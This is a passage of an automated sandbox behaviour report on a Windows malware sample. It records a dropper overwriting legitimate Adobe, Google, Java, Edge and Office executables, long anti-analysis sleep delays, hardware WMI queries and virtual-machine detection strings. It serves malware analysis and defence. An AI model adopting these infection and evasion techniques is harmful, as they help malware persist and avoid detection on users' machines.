                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\alg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeAPI coverage: 3.3 %
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -38738162554790034s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99873s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99762s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99651s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99545s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -198874s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99314s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99187s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99078s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98950s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98817s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98688s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98406s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98296s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98182s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98066s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97922s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97809s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97703s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97593s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97482s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97375s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97265s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97155s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97046s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96937s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96827s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96718s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96607s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96500s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96390s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -96281s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99781s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99672s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99327s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -99094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98984s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98873s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98766s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98432s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98324s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -98099s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97971s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97855s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97745s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe TID: 3480Thread sleep time: -97598s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe TID: 5408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\alg.exe TID: 5560Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 5428Thread sleep time: -90000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1892Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 7370 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 1354 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5808Thread sleep time: -429180000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5808Thread sleep time: -158160000s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 5740Thread sleep count: 41 > 30
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\msdtc.exe TID: 7300Thread sleep count: 483 > 30
                        Source: C:\Windows\System32\msdtc.exe TID: 7300Thread sleep time: -48300s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7644Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\build.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99873Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99762Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99651Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99545Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99314Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99187Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99078Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98950Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98817Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98688Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98406Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98296Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98182Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98066Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97922Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97809Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97703Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97593Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97482Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97375Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97265Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97155Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97046Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96937Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96827Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96718Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96607Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96500Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96390Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 96281Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99672Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99547Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99327Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99219Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 99094Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98984Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98873Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98766Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98656Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98547Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98432Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98324Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 98099Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97971Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97855Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97745Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeThread delayed: delay time: 97598Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `}PSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4NECVMWar VMware SATA CD00
                        Source: SensorDataService.exe, 00000020.00000002.2378524063.0000000000488000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure Driver
                        Source: SensorDataService.exe, 00000020.00000003.2271764851.00000000004E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2568800965.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2904771126.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2197258729.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device2
                        Source: SensorDataService.exe, 00000020.00000003.2271678378.00000000004FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus DeviceNAP
                        Source: AppVClient.exe, 0000000B.00000003.2130504650.0000000000487000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000002.2132174342.000000000049E000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.2129869821.0000000000480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                        Source: SensorDataService.exe, 00000020.00000003.2272167666.00000000004E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
